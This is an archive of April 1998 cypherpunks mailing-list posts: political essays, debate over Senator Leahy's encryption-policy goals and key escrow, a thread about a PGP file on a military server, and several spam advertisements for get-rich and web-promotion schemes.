At one time Americans had hopes and dreams of success. They always
believed that no matter how poor or uneducated they were their children
could find themselves on top ("Yes Johnny, someday *you* can be
President"). They understood that it was the equality of opportunity that
made this country great. That if a man, through hard work and a little
luck, could take his destiny into his own hands and become anything he
wanted.

    This is no longer true. Through decades of socialist control of the
education and entertainment industries Americans have lost the dream. They
no longer believe that their destinies are in their own hands. Rather than
looking to themselves for the solutions to their problems they look to
government. Rather than blameing their own sloth and ignorance for their
lot in life they blame those who are still willing to strive and succeed.

    Such attitudes are most prevalent among those who need to strive the
hardest. They blame the "establishment", and "angry white men", for their
plight, never once acknowledging their own complacency. When uneducated
immigrants come to this country, unable even to speak the language, and
through hard work and perseverance are able to succeed how can any
legitimacy be given to the claims of the socialist?

    Proof is all around that America is still a land of opportunity. All
one has to do is look to people like Bill Gates, who without benefit of
education or wealth, made himself one of the richest men in the world. 

    Millions of people immigrate to America as they know what
opportunities are here for them. They are not immigrating to Europe, or
Russia, or China, or Cuba because they can see what socialism has made of
these places. Unless Americans wakeup and take notice of the bankruptcy of
the victim mentality of socialism their lot in life will never improve.


-- 
---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/esecure.html                        
---------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Toto" <toto@sk.sympatico.ca>
Date: Sun, 5 Apr 1998 20:06:37 -0700 (PDT)
To: "David Honig" <jya@pipeline.com>
Subject: Re: What's up in SASEBO, or Don't Tug The Beard
Message-ID: <004901bd6108$ab35bbe0$2c62a58e@uymfdlvk>
MIME-Version: 1.0
Content-Type: text/plain


John Young, separating FACT from FUD, wrote:


:David Honig wrote:
:>From: "George Martin" <gmartin@usonet.ne.jp>
:>>Maybe you should've checked out the url to see if it was
:>>valid before you shot your mouth off in public... The file
:>>was removed quite a few months ago and was never download
:>>by anyone outside of the .mil domain.  Take your
:>>troublemaking somewhere else.

:>I of course informed him that he was mininformed or uninformed.
:
:Correct, David. Following your notice, we saved Ft. Bragg's
:utility listing on April 2 and downloaded its military-grade pgp262
:for patriotic display in the public interest at:
:
:   http://jya.com/pgp-mil-export.htm


It mystifies me as to why government FUD disseminators seem to think that
they can spread Fear, Uncertainty and Disinformation on the InterNet with
the same blatant disregard for the facts that they employ in feeding their
mainstream media pets.
The problem with the wild animals free-ranging on the InterNet, of course,
is that not all of them have yet been domesticated and de-fanged. They can,
and will, byte back.

The problem that the InterNet poses for those government administrations and
agencies that desire to extend the unconstitutional rule of fear and
oppression into its bosom is thus:
"The InterNet interprets censorship as damage, and routes around it."
~ John Gilmore

A mountain of lies by unethical, self-serving government entities is
incapable of blocking the access of the citizens to the millions of
molehills strewn about the InterNet which are capable of bringing the
garbage that the government buries underground to the surface, where the
sight and stench of it will be available to those who wish to know the
truth.

The government does not have the resources to intimidate and persecute the
millions of individuals who are capable of placing hard evidence of
government lies on their website, or of stopping the legal dissemination of
US Forbidden Information (TM) to foreign countries, such as Canada, and the
legal forwarding of it to a variety of countries around the world through a
Canadian ISP, such as Sympatico,

I amazes me that a US citizen is subject to imprisonment for sending the
same material to a foreign country that she can legally send to the email
addresses of foreign nationals and foreign embassy employees within the US.
It particularly amazes me that those who manage to get elected to high
office by promising to be 'tough on crime,' and who stress the need for the
citizens to be protected from savage crimes--such as, say...murdering those
in authority--by labelling as criminals and punishing those who do such
things, would be so eager to enact so many far-reaching laws that an
increasing majority of the citizens are, in fact, becomimg criminals and
thus have increasingly little to lose by resisting the government's declared
intention to punish them.

The government goes to great pains to convince the citizens that violence
and killing is justified when it is directed toward The Bad Guys (TM).
Well, when you become a criminal, guess who The Bad Guys (TM) are...


~~~~
Toto  <toto@sk.sympatico.ca>
~~~~
"The Xenix Chainsaw Massacre"
http://www.clas.net/~dave/public/xenix

"WebWorld & the Mythical Circle of Eunuchs"
http://www.clas.net/~dave/public/webworld

"InfoWar -- The Digital Revolution"
http://www.clas.net/~dave/public/infowar3

"Space Aliens Hide My Drugs"
http://www.clas.net/~dave/public/sahmd






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sun, 5 Apr 1998 20:39:46 -0700 (PDT)
To: John Young <jya@pipeline.com>
Subject: Re: Leahy's Crypto Wake-up Call
In-Reply-To: <199804060308.XAA25459@camel7.mindspring.com>
Message-ID: <199804060339.XAA19432@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain


In <199804060308.XAA25459@camel7.mindspring.com>, on 04/05/98 
   at 11:08 PM, John Young <jya@pipeline.com> said:

>  Third, legislation should establish both procedures and 
>standards for access by law enforcement to decryption keys 
>or decryption assistance for both encrypted communications 
>and stored electronic information and only permit such access  upon court
>order authorization, with appropriate notice and  other procedural
>safeguards;

And just *how* do they plan on doing this without either backdoors or
escrow??

>  Fourth, legislation should establish both procedures and 
>standards for access by foreign governments and foreign law  enforcement
>agencies to the plaintext of encrypted 
>communications and stored electronic information of United 
>States persons;

I think not.

They just don't get it.

-- 
---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/esecure.html                        
---------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Sun, 5 Apr 1998 22:00:51 -0700 (PDT)
To: "Martin, FCC George" <marting@mailsa.sas.ftscpac.navy.mil>
Subject: Re: An apology...
In-Reply-To: <F592DE40DF74D11193E60000F4AE3D110113BF@mailsa.sas.ftscpac.navy.mil>
Message-ID: <3.0.5.32.19980405215938.007ab870@otc.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:31 PM 4/6/98 +0900, Martin, FCC George wrote:
>Mr Honig,
>	Further investigation this morning when I got to work shows that
>your post was correct.  Apparantly the file only dissappeared a couple of
>days ago.  My apologies for my hasty words and even hastier actions.  Next
>time I'll choose a source that doesn't have anything to gain (or lose) by
>misrepresenting the facts.  Again, my apologies.
>
>Regards,
>George Martin
>

Indeed.  So that we can prevent this from happening again, I'll 
reveal my deadly hacker tools.  Alta Vista and Beer.

If that weren't enough, I wasn't even looking for a .mil site. I was
looking for pgp tips.   If you try 
http://www.altavista.digital.com/cgi-bin/query?pg=q&stq=10&what=web&kl=XX&q=
%2Bpgp+%2Btips+%2B.mil+bragg+fort&navig90.x=10&navig90.y=5
you'll find that Alta Vista's "Scooter" robot is the troublemaker.
As to his or her motives, you'll have to search for yourself.

As far as "choosing a source that doesn't have anything to gain (or lose) by
misrepresenting the facts", well, damn, if that doesn't seem to
be the pot calling the kettle black.

At least you replied from a .mil address this time, so I don't feel I'm
replying solely to some USO hack.










	honig@alum.mit.edu

Why is the CIA is so full of spies?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 5 Apr 1998 20:08:50 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Leahy's Crypto Wake-up Call
Message-ID: <199804060308.XAA25459@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpt from Congressional Record, April 2, 1998:

WAKE-UP CALL ON ENCRYPTION

  Mr. LEAHY. In my view, encryption legislation should 
promote the following goals:

  First, legislation should ensure the right of Americans 
to choose how to protect the privacy and security of their 
communications and information;

  Second, legislation should bar a government-mandated key 
escrow encryption system;

  Third, legislation should establish both procedures and 
standards for access by law enforcement to decryption keys 
or decryption assistance for both encrypted communications 
and stored electronic information and only permit such access 
upon court order authorization, with appropriate notice and 
other procedural safeguards;

  Fourth, legislation should establish both procedures and 
standards for access by foreign governments and foreign law 
enforcement agencies to the plaintext of encrypted 
communications and stored electronic information of United 
States persons;

  Fifth, legislation should modify the current export regime 
for encryption to promote the global competitiveness of 
American companies;

  Sixth, legislation should not link the use of certificate 
authorities with key recovery agents or, in other words, link 
the use of encryption for confidentiality purposes with use 
of encryption for authenticity and integrity purposes;

  Seventh, legislation should, consistent with these goals of 
promoting privacy and the global competitiveness of our high-
tech industries, help our law enforcement agencies and national 
security agencies deal with the challenges posed by the use of 
encryption; and

  Eighth, legislation should protect the security and privacy 
of information provided by Americans to the government by 
ensuring that encryption products used by the government 
interoperate with commercial encryption products.

  Do you agree with these goals?

  Mr. ASHCROFT. Yes, I agree with these goals and will look to 
these same items as a reference point for the drafting, 
introducing and passage of encryption reform legislation.

  Mr. LEAHY. Would the Senator agree to work with me on 
encryption legislation that achieves these goals and that we 
could bring to the floor this Congress?

  Mr. ASHCROFT. Yes. I believe it is critical for us to address 
this issue and soon. I also believe that we should work together 
to produce a piece of legislation that demonstrates our position 
on encryption policy.

-----

Full remarks: http://jya.com/wakeup-call.txt  (18K)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpl@pronet.com
Date: Sun, 5 Apr 1998 23:20:40 -0700 (PDT)
Subject: Free Avertising For Your Business!!
Message-ID: <199804060620.XAA29253@cygint.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

Just wanted to pass along some info about a new piece of software 
I now call my "secret weapon". It's amazing! Listen to this...

Me and hundreds of others can now reach "millions of potential 
customers" - absolutely FREE!  A lot of us are creating immediate 
"cash flow explosions" - literally overnight!
And blowing our competition right out of the water!

You have to check this thing out.  To get some details, all you 
have to do is Email a request for more info to cpl@zippp.com or 
you can also receive the information through our fax-on-demand by 
calling 1-703-478-9600 Doc#808, and you'll get some information 
faxed or email'ed right back to you in a few minutes.  If for any 
reason you have a problem retrieving the information using these 
two methods, please call our voicemail at 1-800-775-0712 ext.5413.

Take care. I'll talk with you later.

Bill:-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sun, 5 Apr 1998 23:28:04 -0700 (PDT)
To: "William H. Geiger III" <whgiii@invweb.net>
Subject: Re: Leahy's Crypto Wake-up Call
In-Reply-To: <199804060308.XAA25459@camel7.mindspring.com>
Message-ID: <3.0.5.32.19980405232651.0089bb10@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:37 PM 4/5/98 -0500, William H. Geiger III wrote:
>In <199804060308.XAA25459@camel7.mindspring.com>, on 04/05/98 
>   at 11:08 PM, John Young <jya@pipeline.com> said:
>
>>  Third, legislation should establish both procedures and 
>>standards for access by law enforcement to decryption keys 
>>or decryption assistance for both encrypted communications 
>>and stored electronic information and only permit such access  upon court
>>order authorization, with appropriate notice and  other procedural
>>safeguards;
>
>And just *how* do they plan on doing this without either backdoors or
>escrow??

Easy, Constitutional, and doesn't need any new legislation - 
all you need is a warrant or subpoena to tell anybody to
produce those records and materials they have.
If they didn't save a recording of their telephone call or email,
or think the Fifth Amendment reasonably prohibits them
from being compelled to incriminate themselves,
then the prosecution doesn't get anything.  No problem,
and it's worked quite well for 200+ years.

>>  Fourth, legislation should establish both procedures and 
>>standards for access by foreign governments and foreign law  enforcement
>>agencies to the plaintext of encrypted 
>>communications and stored electronic information of United 
>>States persons;
>
>I think not.
>They just don't get it.

There may be cases where there's some foreign jurisdiction
over communications with US persons, either travellers or
emigrants to those governments' territories, and they can
use whatever methods are locally popular; some of them,
like torture, tend to require strongly worded notes
from the State Department complaining about such behaviour.
But as you say, I think not, and no, they don't get it.

Just because Leahy is willing to allow businesses to export
things doesn't mean he isn't a tool of Big Brother.


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Sun, 5 Apr 1998 20:34:48 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Nobody's Mouth
Message-ID: <39db4848.35284c48@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


A REAL "nobody" writes  (behind the list's back) - "Have you gotten rid of
that stansquncr virus yet?  You know, the one where you've been sucking dick
for $5 crackrock?  Guess not." and "Your parents should have fucking killed
themselves for having offspring like you."

"Nobody", I'll tell this to you (at least) once - 

Not only do you not seem to understand the simple nursury rhyme - 'Sticks and
stones may break my bones, but words will never hurt me', you don't seem to
understand that I do.

Your friend,
Stan the Liberal
=====
KPFT 90.1 FM Houston this Wednsday night at about 9:15!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: GreatStuff@da.net
Date: Sun, 5 Apr 1998 23:43:36 -0700 (PDT)
To: WebFriend@toad.com
Subject: Thanks a lot!!
Message-ID: <199804060643.XAA20899@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello and Welcome to Freeyellow Web Pages !
You are about to discover one of the biggest 
opportunities on the Net today ! 

Currently Freeyellow has given out over
170,000 free web pages to people just like you. 

Within the next two years that number is expected to 
grow to more than 5 million people !!

People that realize this opportunity today will be 
rewarded very generously in the future ! 

How hard is it really, to give out Free Web Sites ??

Free for a Lifetime ??

that includes.....

Free Hosting 
Free Lifetime Email address
Free Email on demand
Free Web Page counters
Free Classifieds
Free Online Chat Rooms
Free access to Online Graphics
Free File Uploading
Free personalized search engine
and so much more !

We'll so far I would have to say "extremely easy!"

Do you want to be a part of this growth ?

My upline and I have given out more than 25,000 of the 170,000 
free sites currently given away by Freeyellow.

If you are looking for a way to grow your income
then join a very powerful team to help promote Freeyellow.

First you must start by getting your own Free Web Site
to do this go to my site and click on the Freeyellow Banner: 

http://www.freeyellow.com/members3/1freewebsite

Then you can set-up your own Web Site in minutes using a
template. If you how to use HTML or you can create
your own custom page using HTML. (great for beginners or pros)

Next once you have your Web Site set-up 
you'll learn how to become a Sponsor of Freeyellow.

When you join Freeyellow, they will automatically place an
Advertisement Banner on your main Web Page !

Then people that you direct to your site click on the Banner Ad
and sign up under you.

Now the exciting part !!

When people decide to promote Freeyellow under you, you will
not only receive a commission from them but a link to your URL
will be placed at the bottom of their Web Page and so-on to six
levels deep ! This will generate "enormous additional hits"
to your own Web Page !


If this is of interest please let me know we are looking for 
strong leaders in Internet Marketing. Hurry the growth curb is
already starting and we are in the mid pioneering stage...

..make your own history! Here's an opportunity to forge your
own "SUCCESS" story... 

..CHECK IT OUT "NOW!"

	http://www.freeyellow.com/members3/1freewebsite
  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpl@pronet.com
Date: Mon, 6 Apr 1998 00:45:19 -0700 (PDT)
To: <dudzai@africaonline.com>
Subject: Free Avertising For Your Business!!
Message-ID: <199804060745.AAA21581@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

Just wanted to pass along some info about a new piece of software 
I now call my "secret weapon". It's amazing! Listen to this...

Me and hundreds of others can now reach "millions of potential 
customers" - absolutely FREE!  A lot of us are creating immediate 
"cash flow explosions" - literally overnight!
And blowing our competition right out of the water!

You have to check this thing out.  To get some details, all you 
have to do is Email a request for more info to cpl@zippp.com or 
you can also receive the information through our fax-on-demand by 
calling 1-703-478-9600 Doc#808, and you'll get some information 
faxed or email'ed right back to you in a few minutes.  If for any 
reason you have a problem retrieving the information using these 
two methods, please call our voicemail at 1-800-775-0712 ext.5413.

Take care. I'll talk with you later.

Bill:-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Toto" <toto@sk.sympatico.ca>
Date: Mon, 6 Apr 1998 02:59:41 -0700 (PDT)
To: "Martin, FCC George" <honig@otc.net>
Subject: An extra five years? / Re: An apology...
Message-ID: <00b601bd6142$573b93e0$0963a58e@uymfdlvk>
MIME-Version: 1.0
Content-Type: text/plain



Devious Dave Honig wrote:

:Indeed.  So that we can prevent this from happening again, I'll
:reveal my deadly hacker tools.  Alta Vista and Beer.


Doesn't use of Alta Vista and Beer in commission of what authorities wish
was a crime make you subject to an extra five years in prison for your next
speeding ticket?

:Why is the CIA is so full of spies?


To keep an eye on each other...

~~~~
Toto  <toto@sk.sympatico.ca>
~~~~
"The Xenix Chainsaw Massacre"
http://bureau42.base.org/public/xenix

"WebWorld & the Mythical Circle of Eunuchs"
http://bureau42.base.org/public/webworld

"InfoWar -- The Digital Revolution"
http://bureau42.base.org/public/infowar3

"Space Aliens Hide My Drugs"
http://bureau42.base.org/public/sahmd







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Bull <bull@escape.com>
Date: Mon, 6 Apr 1998 02:34:59 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Spam from the FBI
Message-ID: <3528A1B9.D61C7FB1@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.firstbase.com/fbi.htm

--
PGP welcome. Finger for key.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Toto" <toto@sk.sympatico.ca>
Date: Mon, 6 Apr 1998 05:37:48 -0700 (PDT)
To: "CypherPunks" <cypherpunks@toad.com>
Subject: So we can expect lower taxes, now...right?
Message-ID: <00ec01bd6158$78aa87a0$0963a58e@uymfdlvk>
MIME-Version: 1.0
Content-Type: text/plain


    THE LIBERTARIAN, By Vin Suprynowicz

Paul Craig Roberts -- former Treasury Department subaltern during
the Reagan administration -- makes a convincing case that America's
"Department of Justice" is now engaging in fund-raising tactics little
removed from that old standby of Tijuana justice.

  "Junk Bond King" Michael Milken -- now semi-retired to Northern Nevada --
"has been thrice held for ransom" in unjustified prosecutions, Roberts
argues in a March 31 column in Investor's Business Daily.

"Milken forked over
$600 million to buy his way out of a 98-count indictment that University of
Chicago law professor Daniel Fischal has shown to be as phony as a $3 bill.

  "Milken was next seized by the Resolution Trust Corp. and the Federal
Deposit Insurance Corp. 
To buy his way out of endless
litigation" -- funded by the taxpayers, of course -- "Milken handed over
$900 million."

Casting covetous eyes on the $42 million consulting fee Milken had
been paid by News Corp.'s Rupert Murdoch and MCI's Bert Roberts, the
regulators demanded Milken fork it over -- plus a $5 million bonus --
before they would give him a clean bill of health with his parole judge.

Once the government had his money in hand, the
Justice Department wrote to the judge, indicating it had found no reason to
pursue Milken for parole violations -- that Justice had decided he was
innocent of any wrongdoing (start ital)before(end ital) he handed over his
latest ransom.

Milken was held
up and robbed by the SEC in broad daylight for no other reason than the
power the SEC has to extract ransoms from chosen victims."

  Furthermore, Robert concludes, "...What we have witnessed is a conspiracy
between the SEC and the Justice Department to rob a man of $47 million."

  All this would be bad enough if we could believe Mr. Milken alone had
been singled out for such attentions. But in a passing reference in its
March 9 coverage of the federal "antitrust" case against Bill Gates'
Microsoft, Newsweek mentions the same antitrust team has "painful memories
of the endless 1970s and '80s IBM breakup case, which turned into an
O.J.-like courtroom comedy until it was rendered moot by a market-spawned
challenger to IBM ... Microsoft."

  How's that again? The "crimes" in question became "moot" once the chosen
victim lost his preeminence in the market, and thus his attractiveness for
milking? So a necessary part of the definition of this "crime" is success,
while all one must do to escape official "justice" is to lose market share?

  Curiouser and curiouser.

Vin Suprynowicz is the assistant editorial page editor of the Las Vegas
Review-Journal. Readers may contact him via e-mail at vin@lvrj.com. The web
site for the Suprynowicz column is at http://www.nguworld.com/vindex/. The
column is syndicated in the United States and Canada via Mountain Media
Syndications, P.O. Box 4422, Las Vegas Nev. 89127.

~~~~
Toto  <toto@sk.sympatico.ca>
~~~~
"The Xenix Chainsaw Massacre"
http://bureau42.base.org/public/xenix

"WebWorld & the Mythical Circle of Eunuchs"
http://bureau42.base.org/public/webworld

"InfoWar -- The Digital Revolution"
http://bureau42.base.org/public/infowar3

"Space Aliens Hide My Drugs"
http://bureau42.base.org/public/sahmd






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 5 Apr 1998 22:11:49 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Gao Chaos Cypher
Message-ID: <199804060511.HAA08975@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



METHOD AND APPARATUS FOR ENCRYPTING 
AND DECRYPTING INFORMATION USING 
A DIGITAL CHAOS SIGNAL

Patent Number: 5,696,826 
Date of Patent:Dec 9, 1997 
Inventor: Zhenyu Gao 
Appl No:488,088 
Field:Jun 7,1995 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 45201204@13080.com
Date: Mon, 6 Apr 1998 10:47:43 -0700 (PDT)
To: Friend@public.com
Subject: Web Promotion Spider
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


             Web Promote Spider

With well over 80 million documents on the web today,
getting your Site   noticed is a difficult process. Going to 
each Search Engine, Link Page,   Directory, and Newsgroup
to manually submit your page could realistically
take weeks to complete.

Announcing the  Web Promote Spider! Created specifically to
meet the needs of those who want their web pages to get
NOTICED and placed   in the TOP of the Search Engines!
The  Spider automates the   process of submitting your site
and uses powerful technology to get your site   listed in the 
TOP positions.

We've developed the  Web Promote Spider for Windows 95
and NT. This amazing program automatically submits your 
site to over 250   (the list grows daily) major search engines and
directories!

PLUS, the  Web Promote Spider has an Expert HTML Reader
system inside. It will change certain contents of your html text and
automatically prepare needed information for online registration 
in Search   Engines to Optimize your pages and get them listed
on TOP. Originally   engineered for use by the professional
advertising industry, this program is  easy and intuitive to use. 
Beginners will be amazed at how simple it is to take   complete
control over their search engines and index marketing efforts. 

The Web Promote Spider is an industrial strength marketing
tool and an extremely valuable part of any publicity campaign.
With this kind   of power, it should come as no surprise that 
many of our customers have even   built profitable on-line
promotional businesses with this product and their
existing Internet connection!

With your payment of only $49.95 (standard version) you will 
receive the  current Web Promotion Spider program. Also, you
can have all the new  upgrades FREE. Each upgrade will have
a list of new Internet Search  Engines/Online Directories and, 
of course, new features. 

Plus, you get free upgrades which come out twice a month
with new features   and new search engines. Register now 
and you'll continue to get our upgrades,   which keep the 
program up-to-date and getting better and better! Now
submitting to 250+ search engines, free.

We are proud to announce that we now have two powerful 
versions of the Web Promote Spider, our Standard Version 
and our brand new Pro Version. Our Standard Version is 
designed for those individuals who have one or two sites
that they want to be able to submit, and want to see dramatic 
increases in their sites visibility. Our Pro Version is designed
for ISP's, Webmasters,   Hosting Providers, and anyone who 
has multiple sites they need to promote   thoroughly. While the 
standard version does track all registration campaigns
for you, it can still be somewhat time intensive if you register 
several sites at   once, or on a regular basis.

You can see   why the Web Promote Spider is taking the Net
 by storm!

Professional Version

While the standard version of this product seems to meet the 
promotional needs of most of our customers, we also recognize
the need for an 'industrial strength' version of  Web Promote Spider.

The Professional Version is designed for ISP's, Webmasters,
Hosting Providers, and anyone who has multiple sites they need
to promote thoroughly. While the standard version tracks all registration
campaigns for you, it can still be time intensive if you have to register
several sites at once.

To make this easier and more efficient for our customers, we have
added several new features to the brand new Professional Version:

Deep Promotion - This feature will automatically explore every
internal link in your site, and develop registration information for 
each page for you automatically. For instance, in the standard
version, if you have a 30 page site, you would have to run  Web 
Promote Spider thirty times, manually inputting each page into 
the registration queue. In the professional version, this is
all automatic, and can be done in a matter of minutes.

Batch Processing - If you are responsible for registering or 
maintaining several sites, you will find this feature particularly 
useful. You can load in multiple sites, and set the program to
run all the sites at once, generating and saving a separate
registration report on each. This report can easily be copied 
to the Windows clipboard for pasting into reports, email, etc.
Expanded Promotion Resources - While the standard version
of the Spider will submit to 250 registration resources this list
will continue to grow but not as quickly as what's being planned
on the professional version. The Pro Version currently has 400
and will soon have at least 1,000 automatic registration 
options/resources.

If you're a previous owner of the Standard Version, the cost is
only $49.95 to upgrade! If you're a first time user and would like
to start using the Pro Version right away, the cost is $99.90.

                                To Order

Order by fax or mail  Visa or Mastercard

Fax: (425) 379-9722
Mail to: SYS
              11014 19th Ave SE Suite 305
               Everett, WA 98208

We will give you the address to download the program
or for an extra $10.00 we'll send your the program
on CD-Rom

Name:_______________________

Address:_____________________

City:________________

State:________________

Zip:________________

Home Phone:___________________

Work Phone:____________________

Fax:____________________

E-mail_________________

__Standard Version $49.95

__Pro Version   $99.90

__Upgrade $49.95 (From Standard to Pro, if you already 
                                   have the standard version)

___Send CD-Rom $10.00

___Provide download address..No Charge

_____Total

Visa___MasterCard____

Account number:_______________

Expiration Date:________________

I understand that all sales are final.

_______________________
     Signature

---------------------------------------------------------------------------

















   






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bz98n2001m3@juno.com
Date: Mon, 6 Apr 1998 09:48:46 -0700 (PDT)
Subject: Don't Miss Out..  Special Reports (650+) on CD!!!
Message-ID: <199804061648.JAA01799@cygint.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


Are you interested in making an extra $10,000, $50,000, or 
$100,000 a month?

YES! $100,000 a month.  If you believe that someday you'll get 
that big break, get ready because THIS IS IT!  Just imagine, no
more living from paycheck to paycheck. Become FINANCIALLY
INDEPENDENT. Buy your dream home. Purchase that sports car in 
cash. Never again worry about living in debt.

"I currently make $1,350 to $1,800 a day doing this part-time. 
One week after I started, the checks showed up in my mailbox. I 
can't believe it!" - Lynette from Glendale, CA.

I'm sure you've seen couples on TV, sitting on a couch, holding 
each other's hand & claiming to make this sort of MONEY. If all 
these people were lying, don't you think you would have heard 
about it from the Attorney General or Hard Copy? STOP thinking 
that no one can possibly make this kind of money. WE ARE!!

"I was probably the most skeptical person out there, until I saw 
how much my brother-in-law was making. Then I HAD to try it.  The 
first day, I got checks that totaled $5,693. Yesterday I made 
$4,374." - Michael from Everette, WA

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Are you ready to change your life forever?
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

MAKE HUGE PROFITS IN THE INFORMATION AGE
Selling information is one of the FASTEST and EASIEST ways to get 
into the mail order business. Ordinary people just like you and 
me are doing this and smiling all the way to the bank. It is only 
in this amazing business can you start out with practically NO 
CAPITAL and with literally NO LIMIT to your profits.

I bet you know someone who would PAY YOU $5-$15 to know:
HOW TO GET $1,000,000 WORTH OF LIFE INSURANCE WITH NO CASH!
HOW TO STOP PAYING PROPERTY TAXES ON YOUR HOME
WIPE OUT DEBTS WITHOUT BANKRUPTCY
INSIDER SECRETS TO PERSONAL TAX SHELTERS
HOW TO REDUCE YOUR GROCERY BILLS BY 50%
TOP 10 WAYS TO MAKE MONEY ON THE INTERNET

All you have to do is buy our CD-ROM which contain over 650+ how
To money making reports, reprint on diskettes or paper & SELL,
SELL, SELL.  CD-ROM comes with Unlimited Reprint & Resell 
license.  You can sell the reports individually or in sets 
through classified ads,personal contacts, flyers, or on the Net. 
 
Sell them HOWEVER you want and for as MUCH as you want. 
YOU KEEP ALL THE PROFIT.

HERE'S HOW THIS AMAZING PROGRAM WILL MAKE YOU $$$$$
Let's say that you decide to start small, just to see how it 
goes, and you send out only 2,000 email ads a day. (You obviously 
already have an internet connection so e-mail advertising is
FREE.)  Your email would read:

*****************************************************
* SPECIAL REPORT
* "Live in a $100,000 Home without ANY Money" 
* Send $10 & self-addressed stamped envelope to:
* YOUR NAME
* YOUR ADDRESS
* YOUR CITY AND STATE
*****************************************************

Let's also say that the mailing only receives a tiny response 
rate of not  5% , not 1% but 0.5%. That comes out to 10 orders a 
day X $10.00 per order. That's $100 in additional income a day 
for 5 minutes of work. Imagine, that comes out to an additional 
$36,500 a year. Can you use an extra $36,500 a year for 5 minutes 
of work?

BUT what would happen if you sent out 100,000 emails? At the 
smaller response rate of  0.35% , YOU WILL EARN $105,000.00 OF 
SPENDABLE CASH IN JUST ONE MONTH!

Note: Some programs out there send email at 250,000 - 330,000 
emails an HOUR with a 28.8 modem.

Note: Currently there are over 90 million email accounts users & 
predicted to be 500 million by the year 2000

When you order from us, you get:
*Our BEST-SELLING 650+ money making reports on CD-ROM.
*Step-by-step proven instructions on how you can start a 
huge business selling information & become financially 
successful.
*How To Effectively Sell Information With Bulk Email 
*Getting The Most In A Bulk Emailing Campaign 
*How To Make Big Money Selling Simple Informational Reports 
*How To Make Money Marketing Reports 
*How To Write Attention Compelling Advertisements 
Other money making programs sound great, they say place tiny 
classified ads. They forget to tell you that, you have to WRITE 
A BOOK. With our CD-ROM, you can begin selling, TODAY!

For a further description of the CD-ROM go to 
OUR COMPETITORS SITES: DON'T BUY FROM THEM!
http://www.telepages.com/mega1/microinc.htm       $150
http://www.successmasters.com/cd.html	   $59

We sell the exact same CD-ROM w/ the same 
30 Day Money Back Guarantee. For $39.00

E-Z ORDER FORM :
Please print out this form and fill in the blanks legibly to send 
along with payment.

I WOULD LIKE TO ORDER THE FOLLOWING:

QTY		TITLE
_______	CD-ROM (650+ Reports with Full Reprint Rights)

Advertised before for $99.00 NOW *ONLY $39.00*

Name ____________________________________________________

Street Address ____________________________________________

City, State, Zip_____________________________________________

Phone Number_____________________________________________

Email Address_____________________________________________

Payment method: 
____	credit card
____ 	check
____ 	money order

Account Number _____________________________________

Expiration Date ________________

Name on Card _______________________________________

Signature ___________________________________________

ORDER AMOUNT $39.00 + $4.00 shipping/handling = 
$43.00 TOTAL

Send payment along with this completed form to:

Micro Info Publishing
2107 W. Commonwealth Ave. #264
Alhambra, CA 91803

Comes with a 30 DAY MONEY BACK GUARANTEE







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: minshow@gold.uni-miskolc.hu
Date: Sun, 5 Apr 1998 21:45:25 -0700 (PDT)
To: response@yerbiz.com
Subject: JUST RELEASED!  10 Million!!!
Message-ID: <011297055501222@g_fantasm.com>
MIME-Version: 1.0
Content-Type: text/plain



IT WAS JUST RELEASED!!
 
INTRODUCING...MILLIONS VOL. 1A

